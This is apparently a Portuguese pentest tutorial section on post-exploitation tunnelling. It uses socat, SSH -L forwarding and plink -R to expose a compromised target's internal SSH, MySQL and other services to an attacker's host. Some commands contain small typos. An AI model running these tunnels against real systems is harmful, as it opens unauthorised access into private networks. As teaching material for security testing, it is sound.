Tunelamento

Linux

Uma outra técnica importante na pós exploração é o tunelamento, para isso iremos utilizar uma ferramenta chamada socat. A intenção, é criar um túnel para que podemos nos conectar em um serviço do servidor alvo que está rodando internamente para nossa máquina que está fora da rede. Podemos usar da seguinte forma.

socat TCP4:<ip-atacante>:8443 TCP4:127.0.0.1:22

Dessa forma irá redirecionar o serviço da porta 22 que é o SSH, para a porta 8443 que é do atacante (que precisa estar escutando na porta 8443 para receber a conexão).

Para ouvir a conexão, utilizamos

socat TCP4-LISTEN:8443,reuseaddr,fork TCP4-LISTEN:2222-reuseaddr

O comando acima deixa a porta 8443 escutando e direciona o que vier nela para a porta 2222. Após o túnel ser estabelecido, a porta 2222 local do atacante irá ter o serviço vindo do alvo. Então basta nos comunicarmos com a porta 2222 que ela estará vindo diretamente do SSH do alvo.

Se quisermos estabelecer uma conexão com o SSH podemos utilizar essa porta que estamos recebendo a conexão.

ssh root@127.0.0.1 -p 2222 -i <chave-privada>

Após fazer esse tunelamento, podemos utilizar o SSH para direcionar o tráfego local de algum outro serviço para a nossa máquina, supondo que existe um serviço do MySQL rodando na porta 3306. Precisamos passar no parâmetro -L qual será a porta que iremos abrir.

ssh www-data@127.0.0.1 -p 2222 -i <chave-privada> -L 3333:127.0.0.1:3306

Para verificamos se funcionou, podemos utilizar o netstat para visualizar as portas abertas.

netstat -nlpt

Podemos agora conectar (nesse caso não existe senha no MySQL)

mysql -h 127.0.0.1 -P 3333 -u root -P 

Windows

Já no windows, podemos utilizar o plink para isso (conseguimos baixar no mesmo site do putty). Vamos supor então que esteja rodando algum processo na máquina alvo na porta 5555. Podemos utilizar o plink dentro da máquina alvo da seguinte maneira.

plink.exe -ssh -l <login> -pw root -R <ip-atacante>:<porta>:<127.0.0.1>:<5555> <ip-atacante>

Agora na nossa máquina podemos nos conectar.

nc -v 127.0.0.1 <porta>

Last updated